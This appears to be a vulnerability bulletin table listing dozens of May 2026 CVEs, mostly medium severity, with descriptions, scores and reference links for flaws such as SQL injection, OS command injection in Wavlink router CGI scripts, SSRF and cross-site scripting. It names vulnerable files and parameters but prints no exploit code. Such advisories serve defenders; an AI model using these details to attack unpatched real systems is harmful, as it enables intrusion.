| chatchat-space--Langchain-Chatchat | A vulnerability was detected in chatchat-space Langchain-Chatchat up to 0.3.1.3. This vulnerability affects the function files/list_files/retrieve_file/retrieve_file_content/delete_file of the file libs/chatchat-server/chatchat/server/api_server/openai_routes.py of the component Compatible File Service. The manipulation results in missing authentication. The attacker must have access to the local network to execute the attack. The exploit is now public and may be used. The project was informed of the problem early through an issue report but has not responded yet. | 2026-05-05 | 6.3 | CVE-2026-7844 | VDB-361123 | chatchat-space Langchain-Chatchat Compatible File Service openai_routes.py delete_file missing authentication VDB-361123 | CTI Indicators (IOB, IOC, IOA) Submit #807790 | chatchat-space Langchain-Chatchat 0.3.1.3 Missing Authorization / CWE-862 https://github.com/chatchat-space/Langchain-Chatchat/issues/5465 https://github.com/3em0/cve_repo/blob/main/Langchain-Chatchat/Vuln-4-Missing-Auth-File-Endpoints.md https://github.com/chatchat-space/Langchain-Chatchat/ |
| MongoDB Inc.--MongoDB Server | An authenticated user can crash mongod when running $rankFusion or $scoreFusion with an empty pipeline on a view. When resolving a view, the server inspects the aggregation pipeline to determine whether it begins with an Atlas Search stage. For $rankFusion and $scoreFusion, this inspection reads the first element on each stage's input pipeline array without first verifying that the array is non-empty. Supplying an empty pipeline causes a null pointer dereference and crashes the server. This issue affects MongoDB Server 8.2 versions prior to 8.2.7. | 2026-05-07 | 6.5 | CVE-2026-8063 | https://jira.mongodb.org/browse/SERVER-121851 |
| router-for-me--CLIProxyAPI | A vulnerability has been found in router-for-me CLIProxyAPI 6.9.29. Affected by this issue is some unknown functionality of the file internal/api/handlers/management/api_tools.go of the component API Interface. The manipulation of the argument url leads to server-side request forgery. Remote exploitation of the attack is possible. The exploit has been disclosed to the public and may be used. The vendor was contacted early about this disclosure but did not respond in any way. | 2026-05-07 | 6.3 | CVE-2026-8081; VDB-361836; router-for-me CLIProxyAPI api_tools.go server-side request forgery VDB-361836; CTI Indicators (IOB, IOC, IOA) Submit #807811; router-for-me CLIProxyAPI 6.9.29 Server-Side Request Forgery https://github.com/m3ngx1ng/cve/blob/main/CLIProxyAPI-SSRF.md |
| CodeAstro--Online Classroom | A security flaw has been discovered in CodeAstro Online Classroom 1.0. This vulnerability affects unknown code of the file /askquery.php. The manipulation of the argument squeryx results in sql injection. The attack may be performed from remote. The exploit has been released to the public and may be used for attacks. | 2026-05-07 | 6.3 | CVE-2026-8097; VDB-361849; CodeAstro Online Classroom askquery.php sql injection VDB-361849; CTI Indicators (IOB, IOC, TTP, IOA) Submit #808115; codeastro Online Classroom V1.0 SQL Injection http://github.com/suze233/CVE/issues/1 https://codeastro.com/ |
| 8421bit--MiniClaw | A vulnerability was found in 8421bit MiniClaw up to 223c16a1088e138838dcbd18cd65a37c35ac5a84. Affected is the function executeCognitivePulse of the file src/kernel.ts. Performing a manipulation results in os command injection. It is possible to initiate the attack remotely. The exploit has been made public and could be used. This product is using a rolling release to provide continuous delivery. Therefore, no version details for affected nor updated releases are available. The patch is named 028f62216dee9f64833d0f1cfda7c217067ceba8. To fix this issue, it is recommended to deploy a patch. | 2026-05-07 | 6.3 | CVE-2026-8112; VDB-361900; 8421bit MiniClaw kernel.ts executeCognitivePulse os command injection VDB-361900; CTI Indicators (IOB, IOC, TTP, IOA) Submit #808166; 8421bit MiniClaw 0 OS Command Injection https://github.com/8421bit/MiniClaw/issues/4 https://github.com/8421bit/MiniClaw/pull/7 https://github.com/8421bit/MiniClaw/commit/028f62216dee9f64833d0f1cfda7c217067ceba8 https://github.com/8421bit/MiniClaw/ |
| n/a--JeecgBoot | A vulnerability was identified in JeecgBoot up to 3.9.1. Affected by this issue is some unknown functionality of the file /sys/dict/loadTreeData of the component JSON Object Handler. The manipulation of the argument condition leads to sql injection. The attack can be initiated remotely. The exploit is publicly available and might be used. The vendor confirms (translated from Chinese): "It should have been fixed; a batch of issues were recently resolved." | 2026-05-07 | 6.3 | CVE-2026-8114; VDB-361902; JeecgBoot JSON Object loadTreeData sql injection VDB-361902; CTI Indicators (IOB, IOC, TTP, IOA) Submit #808186; https://github.com/jeecgboot/JeecgBoot <=3.91 SQL Injection https://github.com/jeecgboot/JeecgBoot/issues/9571 https://github.com/jeecgboot/JeecgBoot/ |
| huangjunsen0406--xiaozhi-mcphub | A weakness has been identified in huangjunsen0406 xiaozhi-mcphub up to 1.0.3. This vulnerability affects unknown code of the file src/controllers/dxtController.ts. This manipulation of the argument manifest.name causes path traversal. The attack may be initiated remotely. The exploit has been made available to the public and could be used for attacks. The project was informed of the problem early through an issue report but has not responded yet. | 2026-05-07 | 6.3 | CVE-2026-8116; VDB-361904; huangjunsen0406 xiaozhi-mcphub dxtController.ts path traversal VDB-361904; CTI Indicators (IOB, IOC, TTP, IOA) Submit #808260; huangjunsen0406 xiaozhi-mcphub 1.0.3 Path Traversal https://github.com/huangjunsen0406/xiaozhi-mcphub/issues/29 https://github.com/huangjunsen0406/xiaozhi-mcphub/ |
| code-projects--Simple Chat System | A vulnerability was detected in code-projects Simple Chat System 1.0. This vulnerability affects unknown code of the file sendMessage.php. The manipulation of the argument type/length/business parameter validity results in sql injection. The attack may be launched remotely. The exploit is now public and may be used. | 2026-05-08 | 6.3 | CVE-2026-8125; VDB-361915; code-projects Simple Chat System sendMessage.php sql injection VDB-361915; CTI Indicators (IOB, IOC, TTP, IOA) Submit #808679; code-projects Simple Chat System v1.0 SQL Injection https://github.com/MICHEY-Ben/cve/issues/1 https://code-projects.org/ |
| n/a--eladmin | A vulnerability has been found in eladmin up to 2.7. Impacted is the function checkLevel of the file /rest/UserController.java of the component Users API Endpoint. Such manipulation leads to improper access controls. The attack can be executed remotely. The exploit has been disclosed to the public and may be used. The project was informed of the problem early through an issue report but has not responded yet. | 2026-05-08 | 6.3 | CVE-2026-8127; VDB-361917; eladmin Users API Endpoint UserController.java checkLevel access control VDB-361917; CTI Indicators (IOB, IOC, TTP, IOA) Submit #808771; eladmin 2.7 Improper Access Controls https://github.com/elunez/eladmin/issues/897 |
| UGREEN--CM933 | A security vulnerability has been detected in UGREEN CM933 1.1.59.4319. The impacted element is an unknown function of the component Administrative Interface. Such manipulation leads to missing authentication. The attack requires being on the local network. You should upgrade the affected component. The vendor replied: "We have successfully confirmed and reproduced the issue. We take this matter very seriously and have incorporated the fix into our development schedule. The issue is scheduled to be resolved in the release version coming in late April." | 2026-05-09 | 6.3 | CVE-2026-8185; VDB-362337; UGREEN CM933 Administrative missing authentication VDB-362337; CTI Indicators (IOB, IOC) Submit #793588; UGREEN CM933 Managed Network Switch 1.1.59.4319 CWE-306: Missing Authentication for Critical Function |
| Wavlink--NU516U1 | A vulnerability has been found in Wavlink NU516U1 M16U1_V240425. Affected is the function change_wifi_password of the file /cgi-bin/adm.cgi. The manipulation of the argument wl_channel/wl_Pass/EncrypType leads to os command injection. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The vendor was contacted early about this disclosure. | 2026-05-09 | 6.3 | CVE-2026-8188; VDB-362340; Wavlink NU516U1 adm.cgi change_wifi_password os command injection VDB-362340; CTI Indicators (IOB, IOC, TTP, IOA) Submit #800727; Wavlink NU516U1 M16U1_V240425 Command Injection https://github.com/wudipjq/my_vuln/blob/main/Wavlink/vuln_1/1.md |
| Wavlink--NU516U1 | A vulnerability was found in Wavlink NU516U1 M16U1_V240425. Affected by this vulnerability is the function wzdrepeater of the file /cgi-bin/adm.cgi. The manipulation of the argument wlan_bssid/sel_Automode/sel_EncrypTyp results in os command injection. It is possible to launch the attack remotely. The exploit has been made public and could be used. The vendor was contacted early about this disclosure. | 2026-05-09 | 6.3 | CVE-2026-8189; VDB-362341; Wavlink NU516U1 adm.cgi wzdrepeater os command injection VDB-362341; CTI Indicators (IOB, IOC, TTP, IOA) Submit #800728; Wavlink NU516U1 M16U1_V240425 Command Injection https://github.com/wudipjq/my_vuln/blob/main/Wavlink/vuln_2/2.md |
| Wavlink--NU516U1 | A vulnerability was determined in Wavlink NU516U1 M16U1_V240425. Affected by this issue is the function wan of the file /cgi-bin/adm.cgi. The argument ppp_username/ppp_passwd/rwan_ip/rwan_mask/rwan_gateway is passed directly from attacker-controlled input, and its manipulation causes os command injection. The attack can be initiated remotely. The exploit has been publicly disclosed and may be utilized. The vendor was contacted early about this disclosure. | 2026-05-09 | 6.3 | CVE-2026-8190; VDB-362342; Wavlink NU516U1 adm.cgi wan os command injection VDB-362342; CTI Indicators (IOB, IOC, TTP, IOA) Submit #800729; Wavlink NU516U1 M16U1_V240425 Command Injection https://github.com/wudipjq/my_vuln/blob/main/Wavlink/vuln_3/3.md |
| Wavlink--NU516U1 | A vulnerability was identified in Wavlink NU516U1 M16U1_V240425. This affects the function wifi_region of the file /cgi-bin/adm.cgi. Such manipulation of the argument skiplist1/skiplist2 leads to os command injection. The attack can be launched remotely. The exploit is publicly available and might be used. The vendor was contacted early about this disclosure. | 2026-05-09 | 6.3 | CVE-2026-8191; VDB-362343; Wavlink NU516U1 adm.cgi wifi_region os command injection VDB-362343; CTI Indicators (IOB, IOC, TTP, IOA) Submit #800730; Wavlink NU516U1 M16U1_V240425 Command Injection https://github.com/wudipjq/my_vuln/blob/main/Wavlink/vuln_4/4.md |
| Wavlink--NU516U1 | A security flaw has been discovered in Wavlink NU516U1 M16U1_V240425. This vulnerability affects the function wzdap of the file /cgi-bin/adm.cgi. The argument EncrypType/wl_Pass is passed directly from attacker-controlled input, and its manipulation results in os command injection. The attack may be initiated remotely. The exploit has been released to the public and may be used for attacks. The vendor was contacted early about this disclosure. | 2026-05-09 | 6.3 | CVE-2026-8192; VDB-362344; Wavlink NU516U1 adm.cgi wzdap os command injection VDB-362344; CTI Indicators (IOB, IOC, TTP, IOA) Submit #800731; Wavlink NU516U1 M16U1_V240425 Command Injection https://github.com/wudipjq/my_vuln/blob/main/Wavlink/vuln_5/5.md |
| n/a--Akaunting | A weakness has been identified in Akaunting 3.1.21. This issue affects some unknown processing of the file config/dompdf.php of the component Invoice PDF Rendering. Executing a manipulation can lead to server-side request forgery. The attack may be launched remotely. The exploit has been made available to the public and could be used for attacks. The vendor was contacted early about this disclosure but did not respond in any way. | 2026-05-09 | 6.3 | CVE-2026-8193; VDB-362345; Akaunting Invoice PDF Rendering dompdf.php server-side request forgery VDB-362345; CTI Indicators (IOB, IOC, IOA) Submit #800984; akaunting 3.1.21 Server-Side Request Forgery https://drive.google.com/file/d/1zC8gMYeIfZi3CsK6RXBQINU_mllXH_6n/view?usp=drive_link |
| Industrial Application Software IAS--Canias ERP | A security flaw has been discovered in Industrial Application Software IAS Canias ERP 8.03. Impacted is the function Runtime.getRuntime.exec of the component RMI Interface. Performing a manipulation of the argument troiaCode results in os command injection. The attack may be initiated remotely. The exploit has been released to the public and may be used for attacks. The vendor was contacted early about this disclosure but did not respond in any way. | 2026-05-10 | 6.3 | CVE-2026-8217; VDB-362434; Industrial Application Software IAS Canias ERP RMI Runtime.getRuntime.exec os command injection VDB-362434; CTI Indicators (IOB, IOC, TTP, IOA) Submit #808262; Industrial Application Software - IAS Canias ERP 8.03-- Code Injection - Remote Code Execution - (CWE-94/CWE-78) https://hawktrace.com/blog/caniaserp https://gist.github.com/0xb1lal/6ccc2356e7e0a26f7b8a6bd6f0d84bbb |
| Wavlink--NU516U1 | A weakness has been identified in Wavlink NU516U1 240425. This issue affects the function wzdapMesh of the file /cgi-bin/adm.cgi. This manipulation causes os command injection. The attack may be initiated remotely. The exploit has been made available to the public and could be used for attacks. The vendor was contacted early about this disclosure. | 2026-05-10 | 6.3 | CVE-2026-8227; VDB-362444; Wavlink NU516U1 adm.cgi wzdapMesh os command injection VDB-362444; CTI Indicators (IOB, IOC, TTP, IOA) Submit #800732; Wavlink NU516U1 M16U1_V240425 Command Injection https://github.com/wudipjq/my_vuln/blob/main/Wavlink/vuln_6/6.md |
| Wavlink--NU516U1 | A security vulnerability has been detected in Wavlink NU516U1 240425. Impacted is the function advance of the file /cgi-bin/wireless.cgi. Such manipulation of the argument wlan_conf/Channel/skiplist/ieee_80211h leads to os command injection. The attack may be launched remotely. The exploit has been disclosed publicly and may be used. The vendor was contacted early about this disclosure. | 2026-05-10 | 6.3 | CVE-2026-8228; VDB-362445; Wavlink NU516U1 wireless.cgi advance os command injection VDB-362445; CTI Indicators (IOB, IOC, TTP, IOA) Submit #800733; Wavlink NU516U1 M16U1_V240425 Command Injection https://github.com/wudipjq/my_vuln/blob/main/Wavlink/vuln_7/7.md |
| Wavlink--NU516U1 | A vulnerability was detected in Wavlink NU516U1 240425. The affected element is the function WifiBasic of the file /cgi-bin/wireless.cgi. Performing a manipulation of the argument AuthMethod/EncrypType results in os command injection. Remote exploitation of the attack is possible. The exploit is now public and may be used. The vendor was contacted early about this disclosure. | 2026-05-10 | 6.3 | CVE-2026-8229; VDB-362446; Wavlink NU516U1 wireless.cgi WifiBasic os command injection VDB-362446; CTI Indicators (IOB, IOC, TTP, IOA) Submit #800734; Wavlink NU516U1 M16U1_V240425 Command Injection https://github.com/wudipjq/my_vuln/blob/main/Wavlink/vuln_8/8.md |
| Wavlink--NU516U1 | A flaw has been found in Wavlink NU516U1 240425. The impacted element is the function sys_login1 of the file /cgi-bin/login.cgi. Executing a manipulation of the argument ipaddr can lead to os command injection. The attack can be executed remotely. The exploit has been published and may be used. The vendor was contacted early about this disclosure. | 2026-05-10 | 6.3 | CVE-2026-8230; VDB-362447; Wavlink NU516U1 login.cgi sys_login1 os command injection VDB-362447; CTI Indicators (IOB, IOC, TTP, IOA) Submit #800735; Wavlink NU516U1 M16U1_V240425 Command Injection https://github.com/wudipjq/my_vuln/blob/main/Wavlink/vuln_9/9.md |
| CodeAstro--Online Catering Ordering System | A vulnerability has been found in CodeAstro Online Catering Ordering System 1.0. This affects an unknown function of the file /deleteorder.php. The manipulation of the argument ID leads to sql injection. The attack can be carried out remotely. The exploit has been disclosed to the public and may be used. | 2026-05-10 | 6.3 | CVE-2026-8231; VDB-362448; CodeAstro Online Catering Ordering System deleteorder.php sql injection VDB-362448; CTI Indicators (IOB, IOC, TTP, IOA) Submit #808783; codeastro Online Catering Ordering System V1.0 SQL Injection https://github.com/yihaofuweng/cve/issues/63 https://codeastro.com/ |
| Opencart--OpenCart | OpenCart 3.0.36 contains a cross-site request forgery vulnerability in the /account/edit endpoint that allows unauthenticated attackers to modify victim account details by tricking users into visiting malicious pages. Attackers can craft CSRF payloads that change victim email addresses and account information, then use password reset functionality to gain unauthorized access to compromised accounts. | 2026-05-10 | 5.3 | CVE-2021-47946 | ExploitDB-49407 Official Product Homepage Product Reference VulnCheck Advisory: OpenCart 3.0.36 Account Takeover via Cross Site Request Forgery |
| invoicing--Payments Plugin GetPaid | WordPress GetPaid Plugin 2.4.6 contains an HTML injection vulnerability that allows authenticated attackers to inject arbitrary HTML code by exploiting the Help Text field in payment forms. Attackers can inject malicious HTML including image tags and scripts into the Help Text field during payment form creation, which gets stored in the database and executed in the browser when the form is viewed. | 2026-05-10 | 5.4 | CVE-2021-47948 | ExploitDB-50246 Product Reference VulnCheck Advisory: WordPress GetPaid Plugin 2.4.6 HTML Injection via Help Text |
| Getaawp--WordPress Plugin AAWP | WordPress Plugin AAWP 3.16 contains a reflected cross-site scripting vulnerability that allows authenticated attackers to inject malicious scripts by manipulating the tab parameter. Attackers can craft URLs with XSS payloads in the tab parameter of the aawp-settings admin page to execute arbitrary JavaScript in the context of authenticated users. | 2026-05-10 | 5.4 | CVE-2022-50970 | ExploitDB-50643 Official Product Homepage VulnCheck Advisory: WordPress Plugin AAWP 3.16 Reflected XSS via tab Parameter |
| Hitachi--Hitachi Virtual Storage Platform G130, G150, G350, G370, G700, G900, F350, F370, F700, F900 | Improper restriction of excessive authentication attempts vulnerability in Hitachi Virtual Storage Platform G130, G150, G350, G370, G700, G900, F350, F370, F700, F900, Hitachi Virtual Storage Platform E390, E590, E790, E990, E1090, E390H, E590H, E790H, E1090H, Hitachi Virtual Storage Platform One Block 23, One Block 24, One Block 26, One Block 28. This issue affects Hitachi Virtual Storage Platform G130, G150, G350, G370, G700, G900, F350, F370, F700, F900, Hitachi Virtual Storage Platform E390, E590, E790, E990, E1090, E390H, E590H, E790H, E1090H, Hitachi Virtual Storage Platform One Block 23, One Block 24, One Block 26, One Block 28: before DKCMAIN Ver 88-08-16-xx/00, GUM Ver. 88-08-20/00; before DKCMAIN Ver 93-07-26-xx/00, GUM Ver. 93-07-26/00; before DKCMAIN Ver A3-04-02-xx/00, EMS Ver. A3-04-02/00; before DKCMAIN Ver A3-03-41-xx/00, EMS Ver. A3-03-41/00; before DKCMAIN Ver A3-03-03-xx/00, EMS Ver. A3-03-02/00. | 2026-05-07 | 5.3 | CVE-2025-2514 | https://www.hitachi.com/products/it/storage-solutions/sec_info/2026/2026_306.html |
| HCL--BigFix Service Management (SM) | HCL BigFix Service Management (SM) is vulnerable to information exposure due to improper error handling within its reporting module. It was observed that supplying an invalid or out-of-range value to the consumer_company parameter during a report-viewing request causes the application to trigger an unhandled exception. | 2026-05-06 | 5.3 | CVE-2025-31960 | https://support.hcl-software.com/csm?id=kb_article&sysparm_article=KB0128144 |
| HCL--DFXAnalytics | HCL DFXAnalytics is affected by an Insecure Security Header configuration vulnerability where the Content-Security-Policy does not define strict directives for object-src and base-uri, which could allow an attacker to exploit injection vectors such as Cross-Site Scripting (XSS). | 2026-05-06 | 5.3 | CVE-2025-31970 | https://support.hcl-software.com/csm?id=kb_article&sysparm_article=KB0130569 |
| WEN Themes--WEN Logo Slider | Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in WEN Themes WEN Logo Slider allows DOM-Based XSS. This issue affects WEN Logo Slider: from n/a through 3.4.0. | 2026-05-07 | 5.9 | CVE-2025-62127 | https://patchstack.com/database/wordpress/plugin/wen-logo-slider/vulnerability/wordpress-wen-logo-slider-plugin-3-4-0-cross-site-scripting-xss-vulnerability?_s_id=cve |
| Magepeople inc.--Bus Ticket Booking with Seat Reservation | Missing Authorization vulnerability in Magepeople inc. Bus Ticket Booking with Seat Reservation allows Exploiting Incorrectly Configured Access Control Security Levels. This issue affects Bus Ticket Booking with Seat Reservation: from n/a before 5.6.8. | 2026-05-07 | 5.3 | CVE-2025-66105 | https://patchstack.com/database/wordpress/plugin/bus-ticket-booking-with-seat-reservation/vulnerability/wordpress-bus-ticket-booking-with-seat-reservation-plugin-5-6-8-broken-access-control-vulnerability?_s_id=cve |
| WPGraphQL--WPGraphQL | Cross-Site Request Forgery (CSRF) vulnerability in WPGraphQL allows Cross Site Request Forgery. This issue affects WPGraphQL: from n/a through 2.5.3. | 2026-05-07 | 5.4 | CVE-2025-68604 | https://patchstack.com/database/wordpress/plugin/wp-graphql/vulnerability/wordpress-wpgraphql-plugin-2-5-3-cross-site-request-forgery-csrf-vulnerability?_s_id=cve |
| Cisco--Cisco Identity Services Engine Software | A vulnerability in an identity management API endpoint of Cisco ISE could allow an unauthenticated, remote attacker to enumerate valid user accounts on an affected device. This vulnerability exists because the endpoint returns distinguishable error messages when called. An attacker could exploit this vulnerability by sending a series of crafted requests to the affected endpoint and analyzing the differing responses. A successful exploit could allow the attacker to compile a list of valid usernames on an affected system. | 2026-05-06 | 5.3 | CVE-2026-20195 | cisco-sa-ise-unauth-bypass-uxjRXGpb |
| Cisco--Cisco Webex Meetings | A vulnerability in the REST API of Cisco Slido could have allowed an authenticated, remote attacker to access the social profile data of other users or affect quiz and poll results. Cisco has addressed this vulnerability in Cisco Slido and no customer action is needed. This vulnerability existed because of the presence of an insecure direct object reference. Prior to this vulnerability being addressed, an attacker could have exploited this vulnerability by sending a crafted request to the vulnerable API endpoint. A successful exploit could have allowed the attacker to view the social profiles of other users or affect quiz and poll results. | 2026-05-06 | 5.4 | CVE-2026-20219 | cisco-sa-slido-idor-CpsFmKxN |
| Qualcomm, Inc.--Snapdragon | Memory corruption while processing IOCTL command when device is in power-save state. | 2026-05-04 | 5.5 | CVE-2026-25266 | https://docs.qualcomm.com/product/publicresources/securitybulletin/may-2026-bulletin.html |
| WProyal--Royal Elementor Addons | Missing Authorization vulnerability in WProyal Royal Elementor Addons allows Exploiting Incorrectly Configured Access Control Security Levels. This issue affects Royal Elementor Addons: from n/a before 1.7.1053. | 2026-05-07 | 5.3 | CVE-2026-25436 | https://patchstack.com/database/wordpress/plugin/royal-elementor-addons/vulnerability/wordpress-royal-elementor-addons-plugin-1-7-1053-broken-access-control-vulnerability?_s_id=cve |
| weDevs--Happy Addons for Elementor | Exposure of Sensitive System Information to an Unauthorized Control Sphere vulnerability in weDevs Happy Addons for Elementor allows Retrieve Embedded Sensitive Data. This issue affects Happy Addons for Elementor: from n/a through 3.20.8. | 2026-05-07 | 5.3 | CVE-2026-25468 | https://patchstack.com/database/wordpress/plugin/happy-elementor-addons/vulnerability/wordpress-happy-addons-for-elementor-plugin-3-20-8-sensitive-data-exposure-vulnerability?_s_id=cve |
| wpmudev--Forminator Forms Contact Form, Payment Form & Custom Form Builder | The Forminator plugin for WordPress is vulnerable to authorization bypass in all versions up to, and including, 1.52.0. This is due to the plugin not properly verifying that a user is authorized to perform an action when processing attacker-supplied Stripe PaymentIntent identifiers in the public payment flow. This makes it possible for unauthenticated attackers to submit high-value paid forms as completed by reusing a previously succeeded low-value Stripe PaymentIntent, resulting in underpayment/payment bypass conditions. | 2026-05-05 | 5.3 | CVE-2026-2729 | https://www.wordfence.com/threat-intel/vulnerabilities/id/1afb94ab-b3ba-4598-8ff4-f9ffc6717371?source=cve https://plugins.trac.wordpress.org/changeset/3500669/forminator |
| YITH--YITH WooCommerce Wishlist | Authorization Bypass Through User-Controlled Key vulnerability in YITH YITH WooCommerce Wishlist allows Exploiting Incorrectly Configured Access Control Security Levels. This issue affects YITH WooCommerce Wishlist: from n/a through 4.12.0. | 2026-05-07 | 5.3 | CVE-2026-27329 | https://patchstack.com/database/wordpress/plugin/yith-woocommerce-wishlist/vulnerability/wordpress-yith-woocommerce-wishlist-plugin-4-12-0-insecure-direct-object-references-idor-vulnerability?_s_id=cve |
| bPlugins--PDF Poster | Missing Authorization vulnerability in bPlugins PDF Poster allows Exploiting Incorrectly Configured Access Control Security Levels. This issue affects PDF Poster: from n/a through 2.4.1. | 2026-05-07 | 5.3 | CVE-2026-27416 | https://patchstack.com/database/wordpress/plugin/pdf-poster/vulnerability/wordpress-pdf-poster-plugin-2-4-1-broken-access-control-vulnerability?_s_id=cve |
| traccar--traccar | Traccar is an open source GPS tracking system. In org.traccar:traccar versions starting at 6.11.1 before 6.13.0, the KML and GPX export functionality writes device names to XML output without proper escaping. An attacker with low privileges can create a device with a crafted name that injects XML content into exported files. If another user exports and opens the affected KML or GPX file, this can corrupt the file structure and spoof exported location data. This issue is fixed in version 6.13.0. | 2026-05-05 | 5.4 | CVE-2026-27693 | https://github.com/traccar/traccar/security/advisories/GHSA-32pj-vrqc-x656 https://github.com/traccar/traccar/blob/v6.11.0/src/main/java/org/traccar/reports/GpxExportProvider.java#L52-L54 |
| traccar--traccar | Traccar is an open source GPS tracking system. In org.traccar:traccar versions starting at 6.11.1 before 6.13.0, the email notification templates insert user-controlled device, geofence, and driver names into HTML email output without proper escaping. An attacker with low privileges can store crafted HTML in these fields, which is then rendered in notification emails sent to other users with access to the affected devices. This can lead to phishing or spoofed email content. This issue is fixed in version 6.13.0. | 2026-05-05 | 5.4 | CVE-2026-27694 | https://github.com/traccar/traccar/security/advisories/GHSA-6hfr-mj4m-hrvv |
| elabftw--elabftw | eLabFTW is an open source electronic lab notebook. In elabftw versions through 5.4.1, the login flow did not reliably preserve the multi-factor authentication state across authentication steps. Under certain conditions, an attacker with valid primary credentials could complete authentication with an attacker-controlled TOTP secret and bypass the additional factor. This could result in unauthorized account access. This issue is fixed in version 5.4.2. | 2026-05-05 | 5.9 | CVE-2026-28510 | https://github.com/elabftw/elabftw/security/advisories/GHSA-x5wv-c9q4-fj65 https://github.com/elabftw/elabftw/commit/8b7a575aef128870861187eaa2b2f0f08654ecf9 |
| n/a--Pluck CMS | Cross-site scripting vulnerability in Pluck CMS before v.4.7.21dev allows a remote attacker to escalate privileges via editpage.php and the sanitizePageContent function. | 2026-05-04 | 5.7 | CVE-2026-31205 | https://github.com/pluck-cms/pluck/blob/main/data/inc/functions.all.php#L207 https://github.com/pluck-cms/pluck/blob/main/data/inc/editpage.php https://github.com/pluck-cms/pluck/issues/141 https://medium.com/@nakah_/pluck-cms-stored-xss-in-page-editor-cve-2026-31205-3b0526743e1d?postPublishedType=initial |
| mercadopago--Mercado Pago payments for WooCommerce | The Mercado Pago payments for WooCommerce plugin for WordPress is vulnerable to unauthorized access of data due to a missing capability check on the 'mp_pix_image' WooCommerce API endpoint in all versions up to, and including, 8.7.11. This makes it possible for unauthenticated attackers to retrieve PIX payment QR code images for arbitrary orders. PIX QR codes contain sensitive merchant information including PIX keys (which may be CPF/CNPJ personal identifiers), transaction amounts, merchant name and city, and MercadoPago transaction references. | 2026-05-06 | 5.3 | CVE-2026-3208 | https://www.wordfence.com/threat-intel/vulnerabilities/id/986e0252-b94d-4ac8-9083-0218fa8a651e?source=cve https://plugins.trac.wordpress.org/browser/woocommerce-mercadopago/tags/8.7.10/src/Gateways/PixGateway.php#L358 https://plugins.trac.wordpress.org/browser/woocommerce-mercadopago/tags/8.7.10/src/Gateways/PixGateway.php#L92 https://plugins.trac.wordpress.org/changeset?old_path=%2Fwoocommerce-mercadopago/tags/8.7.11&new_path=%2Fwoocommerce-mercadopago/tags/8.7.12 |
| EZVIZ--EZVIZ APP | Some EZVIZ products use older versions of cloud feature modules with legacy API interfaces, which put transmitted data at risk: an attacker who can eavesdrop on network requests can obtain the data. Users are advised to upgrade the app to the latest version and enable the video encryption feature. | 2026-05-09 | 5.3 | CVE-2026-32683 | https://www.ezviz.com/inter/trust-center/security/security-notice/2026.05.08 https://www.hikvision.com/en/support/cybersecurity/security-advisory/security-vulnerability-in-cloud-function-modules-of-some-hikvisi/ |
| Red Hat--Fast Datapath for RHEL 7 | A flaw was found in Open vSwitch. When Open vSwitch is configured with a conntrack flow using FTP helpers over the userspace datapath, a remote attacker can send a specially crafted FTP stream containing an EPASV command exceeding 255 characters. The resulting heap access error can crash the process, causing a denial of service (DoS) on the affected system. | 2026-05-05 | 5.9 | CVE-2026-34956 | https://access.redhat.com/security/cve/CVE-2026-34956 RHBZ#2453459 |
| ZTE--ZTE PROCESS Guard service | There is a local privilege escalation vulnerability in the ZTE PROCESS Guard service of the cloud computer client, which may allow local arbitrary code execution, privilege escalation and path traversal bypass. | 2026-05-06 | 5.2 | CVE-2026-40001 | https://support.zte.com.cn/zte-iccp-isupport-webui/bulletin/detail/1477954674427011121 |
| ZTE--ZX297520V3 BootROM | ZTE ZX297520V3 BootROM contains a vulnerability that allows arbitrary memory writes via USB. Attackers can exploit the lack of target address validation in the USB download mode to write data to any location in BootROM runtime memory, thereby overwriting the stack, hijacking the execution flow, bypassing the Secure Boot signature verification mechanism, and achieving unauthorized code execution. | 2026-05-07 | 5.1 | CVE-2026-40003 | https://support.zte.com.cn/zte-iccp-isupport-webui/bulletin/detail/2144487415169560645 |
| ZTE--ZXCLOUD iRAI | There exists an openssl.cnf privilege escalation vulnerability in ZTE Cloud PC client uSmartview. An attacker can execute arbitrary code locally and escalate privileges. | 2026-05-07 | 5.5 | CVE-2026-40004 | https://support.zte.com.cn/zte-iccp-isupport-webui/bulletin/detail/3126272076755775573 |
| PHPOffice--PhpSpreadsheet | PhpSpreadsheet is a pure PHP library for reading and writing spreadsheet files. The HTML writer skips htmlspecialchars escaping when a cell's formatted value differs from the original value. When a cell has a custom number format containing the text placeholder @ along with any additional literal characters (for example ". @", "@ ", or "x@"), the formatter replaces @ with the cell value and adds the extra characters, causing the formatted value to differ from the original and bypassing HTML escaping entirely. An attacker who can control the cell value and number format of an uploaded spreadsheet that is later converted to HTML and displayed to other users can achieve stored cross-site scripting. This issue is fixed in versions 5.7.0, 3.10.5, 2.4.5, 2.1.16, and 1.30.4. | 2026-05-06 | 5.4 | CVE-2026-40296 | https://github.com/PHPOffice/PhpSpreadsheet/security/advisories/GHSA-hrmw-qprp-wgmc |
| open-telemetry--opentelemetry-dotnet | OpenTelemetry.Exporter.Zipkin is the .NET Zipkin exporter for OpenTelemetry. In versions 1.15.2 and earlier, the Zipkin exporter remote endpoint cache accepts unbounded key growth derived from span attributes. In high-cardinality scenarios, a process using Zipkin export for client or producer spans could experience avoidable memory growth under sustained unique remote endpoint values, increasing process memory usage over time and degrading availability. This issue is fixed in version 1.15.3, which introduces a bounded, thread-safe LRU cache for remote endpoints with a fixed maximum size. | 2026-05-06 | 5.3 | CVE-2026-41310 | https://github.com/open-telemetry/opentelemetry-dotnet/security/advisories/GHSA-88hf-wf7h-7w4m https://github.com/open-telemetry/opentelemetry-dotnet/pull/7081 |
| istio--istio | Istio is an open platform to connect, manage, and secure microservices. Prior to versions 1.28.6 and 1.29.2, when a RequestAuthentication resource is created with a jwksUri pointing to an internal service, istiod makes an unauthenticated HTTP GET request to that URL without filtering out localhost or link-local IPs. This can result in sensitive data being distributed to Envoy proxies via xDS configuration. This issue has been patched in versions 1.28.6 and 1.29.2. | 2026-05-07 | 5 | CVE-2026-41413 | https://github.com/istio/istio/security/advisories/GHSA-fgw5-hp8f-xfhc https://github.com/istio/istio/releases/tag/1.28.6 https://github.com/istio/istio/releases/tag/1.29.2 |
